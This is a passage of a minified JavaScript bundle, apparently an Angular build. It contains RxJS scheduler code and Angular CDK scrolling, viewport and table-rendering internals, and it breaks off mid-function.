ie(t.on)&&ie(t.off)}(t)?Ghe.map(vz(t,a)):[];if(!n&&Gt(t))return Ut(c=>Tc(c,a,e))(pn(t));if(!n)throw new TypeError("Invalid event target");return new G(c=>{const d=(...T)=>c.next(1<T.length?T:T[0]);return n(d),()=>r(d)})}function vz(t,a){return e=>i=>t[e](a,i)}class Khe extends I{constructor(a,e){super()}schedule(a,e=0){return this}}const C3={setInterval(t,a,...e){const{delegate:i}=C3;return null!=i&&i.setInterval?i.setInterval(t,a,...e):setInterval(t,a,...e)},clearInterval(t){const{delegate:a}=C3;return((null==a?void 0:a.clearInterval)||clearInterval)(t)},delegate:void 0};class sw extends Khe{constructor(a,e){super(a,e),this.scheduler=a,this.work=e,this.pending=!1}schedule(a,e=0){if(this.closed)return this;this.state=a;const i=this.id,n=this.scheduler;return null!=i&&(this.id=this.recycleAsyncId(n,i,e)),this.pending=!0,this.delay=e,this.id=this.id||this.requestAsyncId(n,this.id,e),this}requestAsyncId(a,e,i=0){return C3.setInterval(a.flush.bind(a,this),i)}recycleAsyncId(a,e,i=0){if(null!=i&&this.delay===i&&!1===this.pending)return e;C3.clearInterval(e)}execute(a,e){if(this.closed)return new Error("executing a cancelled action");this.pending=!1;const i=this._execute(a,e);if(i)return i;!1===this.pending&&null!=this.id&&(this.id=this.recycleAsyncId(this.scheduler,this.id,null))}_execute(a,e){let n,i=!1;try{this.work(a)}catch(r){i=!0,n=r||new Error("Scheduled action threw falsy error")}if(i)return this.unsubscribe(),n}unsubscribe(){if(!this.closed){const{id:a,scheduler:e}=this,{actions:i}=e;this.work=this.state=this.scheduler=null,this.pending=!1,ae(i,this),null!=a&&(this.id=this.recycleAsyncId(e,a,null)),this.delay=null,super.unsubscribe()}}}const Wy={schedule(t){let a=requestAnimationFrame,e=cancelAnimationFrame;const{delegate:i}=Wy;i&&(a=i.requestAnimationFrame,e=i.cancelAnimationFrame);const n=a(r=>{e=void 0,t(r)});return new I(()=>null==e?void 0:e(n))},requestAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.requestAnimationFrame)||requestAnimationFrame)(...t)},cancelAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.cancelAnimationFrame)||cancelAnimationFrame)(...t)},delegate:void 0};class Fy{constructor(a,e=Fy.now){this.schedulerActionCtor=a,this.now=e}schedule(a,e=0,i){return new this.schedulerActionCtor(this,a).schedule(i,e)}}Fy.now=Kx.now;class cw extends Fy{constructor(a,e=Fy.now){super(a,e),this.actions=[],this._active=!1,this._scheduled=void 0}flush(a){const{actions:e}=this;if(this._active)return void e.push(a);let i;this._active=!0;do{if(i=a.execute(a.state,a.delay))break}while(a=e.shift());if(this._active=!1,i){for(;a=e.shift();)a.unsubscribe();throw i}}}const Az=new class Yhe extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class Xhe extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=Wy.requestAnimationFrame(()=>a.flush(void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(Wy.cancelAnimationFrame(e),a._scheduled=void 0)}});let lw,Jhe=1;const y3={};function Tz(t){return t in y3&&(delete y3[t],!0)}const Zhe={setImmediate(t){const a=Jhe++;return y3[a]=!0,lw||(lw=Promise.resolve()),lw.then(()=>Tz(a)&&t()),a},clearImmediate(t){Tz(t)}},{setImmediate:efe,clearImmediate:tfe}=Zhe,b3={setImmediate(...t){const{delegate:a}=b3;return((null==a?void 0:a.setImmediate)||efe)(...t)},clearImmediate(t){const{delegate:a}=b3;return((null==a?void 0:a.clearImmediate)||tfe)(t)},delegate:void 0},dw=new class afe extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class ife extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=b3.setImmediate(a.flush.bind(a,void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(b3.clearImmediate(e),a._scheduled=void 0)}}),Vy=new cw(sw),nfe=Vy;function M3(t=0,a,e=nfe){let i=-1;return null!=a&&(co(a)?e=a:i=a),new G(n=>{let r=function rfe(t){return t instanceof Date&&!isNaN(t)}(t)?+t-e.now():t;r<0&&(r=0);let c=0;return e.schedule(function(){n.closed||(n.next(c++),0<=i?this.schedule(void 0,i):n.complete())},r)})}function mw(t,a=Vy){return function ofe(t){return Ie((a,e)=>{let i=!1,n=null,r=null,c=!1;const d=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const k=n;n=null,e.next(k)}c&&e.complete()},T=()=>{r=null,c&&e.complete()};a.subscribe(Ae(e,k=>{i=!0,n=k,r||pn(t(k)).subscribe(r=Ae(e,d,T))},()=>{c=!0,(!i||!r||r.closed)&&e.complete()}))})}(()=>M3(t,a))}let By=(()=>{class t{constructor(e,i,n){this._ngZone=e,this._platform=i,this._scrolled=new J,this._globalSubscription=null,this._scrolledCount=0,this.scrollContainers=new Map,this._document=n}register(e){this.scrollContainers.has(e)||this.scrollContainers.set(e,e.elementScrolled().subscribe(()=>this._scrolled.next(e)))}deregister(e){const i=this.scrollContainers.get(e);i&&(i.unsubscribe(),this.scrollContainers.delete(e))}scrolled(e=20){return this._platform.isBrowser?new G(i=>{this._globalSubscription||this._addGlobalListener();const n=e>0?this._scrolled.pipe(mw(e)).subscribe(i):this._scrolled.subscribe(i);return this._scrolledCount++,()=>{n.unsubscribe(),this._scrolledCount--,this._scrolledCount||this._removeGlobalListener()}}):Bi()}ngOnDestroy(){this._removeGlobalListener(),this.scrollContainers.forEach((e,i)=>this.deregister(i)),this._scrolled.complete()}ancestorScrolled(e,i){const n=this.getAncestorScrollContainers(e);return this.scrolled(i).pipe(Dn(r=>!r||n.indexOf(r)>-1))}getAncestorScrollContainers(e){const i=[];return this.scrollContainers.forEach((n,r)=>{this._scrollableContainsElement(r,e)&&i.push(r)}),i}_getWindow(){return this._document.defaultView||window}_scrollableContainsElement(e,i){let n=Gr(i),r=e.getElementRef().nativeElement;do{if(n==r)return!0}while(n=n.parentElement);return!1}_addGlobalListener(){this._globalSubscription=this._ngZone.runOutsideAngular(()=>Tc(this._getWindow().document,"scroll").subscribe(()=>this._scrolled.next()))}_removeGlobalListener(){this._globalSubscription&&(this._globalSubscription.unsubscribe(),this._globalSubscription=null)}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(sr),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uw=(()=>{class t{constructor(e,i,n,r){this.elementRef=e,this.scrollDispatcher=i,this.ngZone=n,this.dir=r,this._destroyed=new J,this._elementScrolled=new G(c=>this.ngZone.runOutsideAngular(()=>Tc(this.elementRef.nativeElement,"scroll").pipe(ea(this._destroyed)).subscribe(c)))}ngOnInit(){this.scrollDispatcher.register(this)}ngOnDestroy(){this.scrollDispatcher.deregister(this),this._destroyed.next(),this._destroyed.complete()}elementScrolled(){return this._elementScrolled}getElementRef(){return this.elementRef}scrollTo(e){const i=this.elementRef.nativeElement,n=this.dir&&"rtl"==this.dir.value;null==e.left&&(e.left=n?e.end:e.start),null==e.right&&(e.right=n?e.start:e.end),null!=e.bottom&&(e.top=i.scrollHeight-i.clientHeight-e.bottom),n&&0!=zy()?(null!=e.left&&(e.right=i.scrollWidth-i.clientWidth-e.left),2==zy()?e.left=e.right:1==zy()&&(e.left=e.right?-e.right:e.right)):null!=e.right&&(e.left=i.scrollWidth-i.clientWidth-e.right),this._applyScrollToOptions(e)}_applyScrollToOptions(e){const i=this.elementRef.nativeElement;Mz()?i.scrollTo(e):(null!=e.top&&(i.scrollTop=e.top),null!=e.left&&(i.scrollLeft=e.left))}measureScrollOffset(e){const i="left",n="right",r=this.elementRef.nativeElement;if("top"==e)return r.scrollTop;if("bottom"==e)return r.scrollHeight-r.clientHeight-r.scrollTop;const c=this.dir&&"rtl"==this.dir.value;return"start"==e?e=c?n:i:"end"==e&&(e=c?i:n),c&&2==zy()?e==i?r.scrollWidth-r.clientWidth-r.scrollLeft:r.scrollLeft:c&&1==zy()?e==i?r.scrollLeft+r.scrollWidth-r.clientWidth:-r.scrollLeft:e==i?r.scrollLeft:r.scrollWidth-r.clientWidth-r.scrollLeft}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(By),Ee(qi),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-scrollable",""],["","cdkScrollable",""]]}),t})(),bm=(()=>{class t{constructor(e,i,n){this._platform=e,this._change=new J,this._changeListener=r=>{this._change.next(r)},this._document=n,i.runOutsideAngular(()=>{if(e.isBrowser){const r=this._getWindow();r.addEventListener("resize",this._changeListener),r.addEventListener("orientationchange",this._changeListener)}this.change().subscribe(()=>this._viewportSize=null)})}ngOnDestroy(){if(this._platform.isBrowser){const e=this._getWindow();e.removeEventListener("resize",this._changeListener),e.removeEventListener("orientationchange",this._changeListener)}this._change.complete()}getViewportSize(){this._viewportSize||this._updateViewportSize();const e={width:this._viewportSize.width,height:this._viewportSize.height};return this._platform.isBrowser||(this._viewportSize=null),e}getViewportRect(){const e=this.getViewportScrollPosition(),{width:i,height:n}=this.getViewportSize();return{top:e.top,left:e.left,bottom:e.top+n,right:e.left+i,height:n,width:i}}getViewportScrollPosition(){if(!this._platform.isBrowser)return{top:0,left:0};const e=this._document,i=this._getWindow(),n=e.documentElement,r=n.getBoundingClientRect();return{top:-r.top||e.body.scrollTop||i.scrollY||n.scrollTop||0,left:-r.left||e.body.scrollLeft||i.scrollX||n.scrollLeft||0}}change(e=20){return e>0?this._change.pipe(mw(e)):this._change}_getWindow(){return this._document.defaultView||window}_updateViewportSize(){const e=this._getWindow();this._viewportSize=this._platform.isBrowser?{width:e.innerWidth,height:e.innerHeight}:{width:0,height:0}}}return t.\u0275fac=function(e){return new(e||t)(At(sr),At(qi),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),Hy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,uu,R1,uu]}),t})();const lfe=[[["caption"]],[["colgroup"],["col"]]],dfe=["caption","colgroup, col"];function hw(t){return class extends t{constructor(...a){super(...a),this._sticky=!1,this._hasStickyChanged=!1}get sticky(){return this._sticky}set sticky(a){const e=this._sticky;this._sticky=wi(a),this._hasStickyChanged=e!==this._sticky}hasStickyChanged(){const a=this._hasStickyChanged;return this._hasStickyChanged=!1,a}resetStickyChanged(){this._hasStickyChanged=!1}}}const k1=new ni("CDK_TABLE");let P1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellDef",""]]}),t})(),O1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderCellDef",""]]}),t})(),v3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterCellDef",""]]}),t})();class ffe{}const pfe=hw(ffe);let Nh=(()=>{class t extends pfe{constructor(e){super(),this._table=e,this._stickyEnd=!1}get name(){return this._name}set name(e){this._setNameInput(e)}get stickyEnd(){return this._stickyEnd}set stickyEnd(e){const i=this._stickyEnd;this._stickyEnd=wi(e),this._hasStickyChanged=i!==this._stickyEnd}_updateColumnCssClassName(){this._columnCssClassName=[`cdk-column-${this.cssClassFriendlyName}`]}_setNameInput(e){e&&(this._name=e,this.cssClassFriendlyName=e.replace(/[^a-z0-9_-]/gi,"-"),this._updateColumnCssClassName())}}return t.\u0275fac=function(e){return new(e||t)(Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkColumnDef",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,P1,5),ha(n,O1,5),ha(n,v3,5)),2&e){let r;Vt(r=Bt())&&(i.cell=r.first),Vt(r=Bt())&&(i.headerCell=r.first),Vt(r=Bt())&&(i.footerCell=r.first)}},inputs:{sticky:"sticky",name:["cdkColumnDef","name"],stickyEnd:"stickyEnd"},features:[ki([{provide:"MAT_SORT_HEADER_COLUMN_DEF",useExisting:t}]),ci]}),t})();class fw{constructor(a,e){e.nativeElement.classList.add(...a._columnCssClassName)}}let pw=(()=>{class t extends fw{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-header-cell"],["th","cdk-header-cell",""]],hostAttrs:["role","columnheader",1,"cdk-header-cell"],features:[ci]}),t})(),_w=(()=>{class t extends fw{constructor(e,i){var n;if(super(e,i),1===(null===(n=e._table)||void 0===n?void 0:n._elementRef.nativeElement.nodeType)){const r=e._table._elementRef.nativeElement.getAttribute("role");i.nativeElement.setAttribute("role","grid"===r||"treegrid"===r?"gridcell":"cell")}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-cell"],["td","cdk-cell",""]],hostAttrs:[1,"cdk-cell"],features:[ci]}),t})();class Dz{constructor(){this.tasks=[],this.endTasks=[]}}const gw=new ni("_COALESCED_STYLE_SCHEDULER");let xz=(()=>{class t{constructor(e){this._ngZone=e,this._currentSchedule=null,this._destroyed=new J}schedule(e){this._createScheduleIfNeeded(),this._currentSchedule.tasks.push(e)}scheduleEnd(e){this._createScheduleIfNeeded(),this._currentSchedule.endTasks.push(e)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_createScheduleIfNeeded(){this._currentSchedule||(this._currentSchedule=new Dz,this._getScheduleObservable().pipe(ea(this._destroyed)).subscribe(()=>{for(;this._currentSchedule.tasks.length||this._currentSchedule.endTasks.length;){const e=this._currentSchedule;this._currentSchedule=new Dz;for(const i of e.tasks)i();for(const i of e.endTasks)i()}this._currentSchedule=null}))}_getScheduleObservable(){return this._ngZone.isStable?Sa(Promise.resolve(void 0)):this._ngZone.onStable.pipe(Cn(1))}}return t.\u0275fac=function(e){return new(e||t)(At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cw=(()=>{class t{constructor(e,i){this.template=e,this._differs=i}ngOnChanges(e){if(!this._columnsDiffer){const i=e.columns&&e.columns.currentValue||[];this._columnsDiffer=this._differs.find(i).create(),this._columnsDiffer.diff(i)}}getColumnsDiff(){return this._columnsDiffer.diff(this.columns)}extractCellTemplate(e){return this instanceof Uy?e.headerCell.template:this instanceof qy?e.footerCell.template:e.cell.template}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(Cd))},t.\u0275dir=Ot({type:t,features:[sa]}),t})();class _fe extends Cw{}const gfe=hw(_fe);let Uy=(()=>{class t extends gfe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(Cd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderRowDef",""]],inputs:{columns:["cdkHeaderRowDef","columns"],sticky:["cdkHeaderRowDefSticky","sticky"]},features:[ci,sa]}),t})();class Cfe extends Cw{}const yfe=hw(Cfe);let qy=(()=>{class t extends yfe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(Cd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterRowDef",""]],inputs:{columns:["cdkFooterRowDef","columns"],sticky:["cdkFooterRowDefSticky","sticky"]},features:[ci,sa]}),t})(),A3=(()=>{class t extends Cw{constructor(e,i,n){super(e,i),this._table=n}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(Cd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkRowDef",""]],inputs:{columns:["cdkRowDefColumns","columns"],when:["cdkRowDefWhen","when"]},features:[ci]}),t})(),Lh=(()=>{class t{constructor(e){this._viewContainer=e,t.mostRecentCellOutlet=this}ngOnDestroy(){t.mostRecentCellOutlet===this&&(t.mostRecentCellOutlet=null)}}return t.mostRecentCellOutlet=null,t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellOutlet",""]]}),t})(),yw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-header-row"],["tr","cdk-header-row",""]],hostAttrs:["role","row",1,"cdk-header-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),Mw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-row"],["tr","cdk-row",""]],hostAttrs:["role","row",1,"cdk-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),T3=(()=>{class t{constructor(e){this.templateRef=e,this._contentClassName="cdk-no-data-row"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","cdkNoDataRow",""]]}),t})();const wz=["top","bottom","left","right"];class bfe{constructor(a,e,i,n,r=!0,c=!0,d){this._isNativeHtmlTable=a,this._stickCellCss=e,this.direction=i,this._coalescedStyleScheduler=n,this._isBrowser=r,this._needsPositionStickyOnElement=c,this._positionListener=d,this._cachedCellWidths=[],this._borderCellCss={top:`${e}-border-elem-top`,bottom:`${e}-border-elem-bottom`,left:`${e}-border-elem-left`,right:`${e}-border-elem-right`}}clearStickyPositioning(a,e){const i=[];for(const n of a)if(n.nodeType===n.ELEMENT_NODE){i.push(n);for(let r=0;r<n.children.length;r++)i.push(n.children[r])}this._coalescedStyleScheduler.schedule(()=>{for(const n of i)this._removeStickyStyle(n,e)})}updateStickyColumns(a,e,i,n=!0){if(!a.length||!this._isBrowser||!e.some(te=>te)&&!i.some(te=>te))return void(this._positionListener&&(this._positionListener.stickyColumnsUpdated({sizes:[]}),this._positionListener.stickyEndColumnsUpdated({sizes:[]})));const r=a[0],c=r.children.length,d=this._getCellWidths(r,n),T=this._getStickyStartColumnPositions(d,e),k=this._getStickyEndColumnPositions(d,i),q=e.lastIndexOf(!0),Y=i.indexOf(!0);this._coalescedStyleScheduler.schedule(()=>{const te="rtl"===this.direction,pe=te?"right":"left",Re=te?"left":"right";for(const Fe of a)for(let Ne=0;Ne<c;Ne++){const et=Fe.children[Ne];e[Ne]&&this._addStickyStyle(et,pe,T[Ne],Ne===q),i[Ne]&&this._addStickyStyle(et,Re,k[Ne],Ne===Y)}this._positionListener&&(this._positionListener.stickyColumnsUpdated({sizes:-1===q?[]:d.slice(0,q+1).map((Fe,Ne)=>e[Ne]?Fe:null)}),this._positionListener.stickyEndColumnsUpdated({sizes:-1===Y?[]:d.slice(Y).map((Fe,Ne)=>i[Ne+Y]?Fe:null).reverse()}))})}stickRows(a,e,i){if(!this._isBrowser)return;const n="bottom"===i?a.slice().reverse():a,r="bottom"===i?e.slice().reverse():e,c=[],d=[],T=[];for(let q=0,Y=0;q<n.length;q++){if(!r[q])continue;c[q]=Y;const te=n[q];T[q]=this._isNativeHtmlTable?Array.from(te.children):[te];const pe=te.getBoundingClientRect().height;Y+=pe,d[q]=pe}const k=r.lastIndexOf(!0);this._coalescedStyleScheduler.schedule(()=>{var q,Y;for(let te=0;te<n.length;te++){if(!r[te])continue;const pe=c[te],Re=te===k;for(const Fe of T[te])this._addStickyStyle(Fe,i,pe,Re)}"top"===i?null===(q=this._positionListener)||void 0===q||q.stickyHeaderRowsUpdated({sizes:d,offsets:c,elements:T}):null===(Y=this._positionListener)||void 0===Y||Y.stickyFooterRowsUpdated({sizes:d,offsets:c,elements:T})})}updateStickyFooterContainer(a,e){if(!this._isNativeHtmlTable)return;const i=a.querySelector("tfoot");this._coalescedStyleScheduler.schedule(()=>{e.some(n=>!n)?this._removeStickyStyle(i,["bottom"]):this._addStickyStyle(i,"bottom",0,!1)})}_removeStickyStyle(a,e){for(const n of e)a.style[n]="",a.classList.remove(this._borderCellCss[n]);wz.some(n=>-1===e.indexOf(n)&&a.style[n])?a.style.zIndex=this._getCalculatedZIndex(a):(a.style.zIndex="",this._needsPositionStickyOnElement&&(a.style.position=""),a.classList.remove(this._stickCellCss))}_addStickyStyle(a,e,i,n){a.classList.add(this._stickCellCss),n&&a.classList.add(this._borderCellCss[e]),a.style[e]=`${i}px`,a.style.zIndex=this._getCalculatedZIndex(a),this._needsPositionStickyOnElement&&(a.style.cssText+="position: -webkit-sticky; position: sticky; ")}_getCalculatedZIndex(a){const e={top:100,bottom:10,left:1,right:1};let i=0;for(const n of wz)a.style[n]&&(i+=e[n]);return i?`${i}`:""}_getCellWidths(a,e=!0){if(!e&&this._cachedCellWidths.length)return this._cachedCellWidths;const i=[],n=a.children;for(let r=0;r<n.length;r++)i.push(n[r].getBoundingClientRect().width);return this._cachedCellWidths=i,i}_getStickyStartColumnPositions(a,e){const i=[];let n=0;for(let r=0;r<a.length;r++)e[r]&&(i[r]=n,n+=a[r]);return i}_getStickyEndColumnPositions(a,e){const i=[];let n=0;for(let r=a.length;r>0;r--)e[r]&&(i[r]=n,n+=a[r]);return i}}const vw=new ni("CDK_SPL");let E3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","rowOutlet",""]]}),t})(),D3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","headerRowOutlet",""]]}),t})(),x3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","footerRowOutlet",""]]}),t})(),w3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","noDataRowOutlet",""]]}),t})(),I3=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._differs=e,this._changeDetectorRef=i,this._elementRef=n,this._dir=c,this._platform=T,this._viewRepeater=k,this._coalescedStyleScheduler=q,this._viewportRuler=Y,this._stickyPositioningListener=te,this._ngZone=pe,this._onDestroy=new J,this._columnDefsByName=new Map,this._customColumnDefs=new Set,this._customRowDefs=new Set,this._customHeaderRowDefs=new Set,this._customFooterRowDefs=new Set,this._headerRowDefChanged=!0,this._footerRowDefChanged=!0,this._stickyColumnStylesNeedReset=!0,this._forceRecalculateCellWidths=!0,this._cachedRenderRowsMap=new Map,this.stickyCssClass="cdk-table-sticky",this.needsPositionStickyOnElement=!0,this._isShowingNoDataRow=!1,this._multiTemplateDataRows=!1,this._fixedLayout=!1,this.contentChanged=new Tt,this.viewChange=new zs({start:0,end:Number.MAX_VALUE}),r||this._elementRef.nativeElement.setAttribute("role","table"),this._document=d,this._isNativeHtmlTable="TABLE"===this._elementRef.nativeElement.nodeName}get trackBy(){return this._trackByFn}set trackBy(e){this._trackByFn=e}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}get multiTemplateDataRows(){return this._multiTemplateDataRows}set multiTemplateDataRows(e){this._multiTemplateDataRows=wi(e),this._rowOutlet&&this._rowOutlet.viewContainer.length&&(this._forceRenderDataRows(),this.updateStickyColumnStyles())}get fixedLayout(){return this._fixedLayout}set fixedLayout(e){this._fixedLayout=wi(e),this._forceRecalculateCellWidths=!0,this._stickyColumnStylesNeedReset=!0}ngOnInit(){this._setupStickyStyler(),this._isNativeHtmlTable&&this._applyNativeTableSections(),this._dataDiffer=this._differs.find([]).create((e,i)=>this.trackBy?this.trackBy(i.dataIndex,i.data):i),this._viewportRuler.change().pipe(ea(this._onDestroy)).subscribe(()=>{this._forceRecalculateCellWidths=!0})}ngAfterContentChecked(){this._cacheRowDefs(),this._cacheColumnDefs();const i=this._renderUpdatedColumns()||this._headerRowDefChanged||this._footerRowDefChanged;this._stickyColumnStylesNeedReset=this._stickyColumnStylesNeedReset||i,this._forceRecalculateCellWidths=i,this._headerRowDefChanged&&(this._forceRenderHeaderRows(),this._headerRowDefChanged=!1),this._footerRowDefChanged&&(this._forceRenderFooterRows(),this._footerRowDefChanged=!1),this.dataSource&&this._rowDefs.length>0&&!this._renderChangeSubscription?this._observeRenderChanges():this._stickyColumnStylesNeedReset&&this.updateStickyColumnStyles(),this._checkStickyStates()}ngOnDestroy(){[this._rowOutlet.viewContainer,this._headerRowOutlet.viewContainer,this._footerRowOutlet.viewContainer,this._cachedRenderRowsMap,this._customColumnDefs,this._customRowDefs,this._customHeaderRowDefs,this._customFooterRowDefs,this._columnDefsByName].forEach(e=>{e.clear()}),this._headerRowDefs=[],this._footerRowDefs=[],this._defaultRowDef=null,this._onDestroy.next(),this._onDestroy.complete(),f3(this.dataSource)&&this.dataSource.disconnect(this)}renderRows(){this._renderRows=this._getAllRenderRows();const e=this._dataDiffer.diff(this._renderRows);if(!e)return this._updateNoDataRow(),void this.contentChanged.next();const i=this._rowOutlet.viewContainer;this._viewRepeater.applyChanges(e,i,(n,r,c)=>this._getEmbeddedViewArgs(n.item,c),n=>n.item.data,n=>{1===n.operation&&n.context&&this._renderCellTemplateForItem(n.record.item.rowDef,n.context)}),this._updateRowIndexContext(),e.forEachIdentityChange(n=>{i.get(n.currentIndex).context.$implicit=n.item.data}),this._updateNoDataRow(),this._ngZone&&qi.isInAngularZone()?this._ngZone.onStable.pipe(Cn(1),ea(this._onDestroy)).subscribe(()=>{this.updateStickyColumnStyles()}):this.updateStickyColumnStyles(),this.contentChanged.next()}addColumnDef(e){this._customColumnDefs.add(e)}removeColumnDef(e){this._customColumnDefs.delete(e)}addRowDef(e){this._customRowDefs.add(e)}removeRowDef(e){this._customRowDefs.delete(e)}addHeaderRowDef(e){this._customHeaderRowDefs.add(e),this._headerRowDefChanged=!0}removeHeaderRowDef(e){this._customHeaderRowDefs.delete(e),this._headerRowDefChanged=!0}addFooterRowDef(e){this._customFooterRowDefs.add(e),this._footerRowDefChanged=!0}removeFooterRowDef(e){this._customFooterRowDefs.delete(e),this._footerRowDefChanged=!0}setNoDataRow(e){this._customNoDataRow=e}updateStickyHeaderRowStyles(){const e=this._getRenderedRows(this._headerRowOutlet),n=this._elementRef.nativeElement.querySelector("thead");n&&(n.style.display=e.length?"":"none");const r=this._headerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["top"]),this._stickyStyler.stickRows(e,r,"top"),this._headerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyFooterRowStyles(){const e=this._getRenderedRows(this._footerRowOutlet),n=this._elementRef.nativeElement.querySelector("tfoot");n&&(n.style.display=e.length?"":"none");const r=this._footerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["bottom"]),this._stickyStyler.stickRows(e,r,"bottom"),this._stickyStyler.updateStickyFooterContainer(this._elementRef.nativeElement,r),this._footerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyColumnStyles(){const e=this._getRenderedRows(this._headerRowOutlet),i=this._getRenderedRows(this._rowOutlet),n=this._getRenderedRows(this._footerRowOutlet);(this._isNativeHtmlTable&&!this._fixedLayout||this._stickyColumnStylesNeedReset)&&(this._stickyStyler.clearStickyPositioning([...e,...i,...n],["left","right"]),this._stickyColumnStylesNeedReset=!1),e.forEach((r,c)=>{this._addStickyColumnStyles([r],this._headerRowDefs[c])}),this._rowDefs.forEach(r=>{const c=[];for(let d=0;d<i.length;d++)this._renderRows[d].rowDef===r&&c.push(i[d]);this._addStickyColumnStyles(c,r)}),n.forEach((r,c)=>{this._addStickyColumnStyles([r],this._footerRowDefs[c])}),Array.from(this._columnDefsByName.values()).forEach(r=>r.resetStickyChanged())}_getAllRenderRows(){const e=[],i=this._cachedRenderRowsMap;this._cachedRenderRowsMap=new Map;for(let n=0;n<this._data.length;n++){let r=this._data[n];const c=this._getRenderRowsForData(r,n,i.get(r));this._cachedRenderRowsMap.has(r)||this._cachedRenderRowsMap.set(r,new WeakMap);for(let d=0;d<c.length;d++){let T=c[d];const k=this._cachedRenderRowsMap.get(T.data);k.has(T.rowDef)?k.get(T.rowDef).push(T):k.set(T.rowDef,[T]),e.push(T)}}return 